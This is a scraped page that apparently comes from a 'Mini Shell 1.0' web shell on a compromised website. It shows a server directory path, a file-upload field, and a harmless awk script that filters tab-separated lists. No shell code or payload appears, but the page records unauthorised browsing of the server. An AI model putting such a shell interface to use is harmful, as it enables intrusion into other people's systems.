HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/self/root/usr/share/tools/
Upload File :
Current File : //proc/self/root/usr/share/tools/trim26lst
#! /usr/bin/awk -f

# $Progeny$

BEGIN {
    FS = "\t";
}

/^[^\t]/ {
    print $0;
}

/^\t/ && $3 !~ /(video)/ && $4 !~ /(unknown|ignore)/ { 
    print $0;
}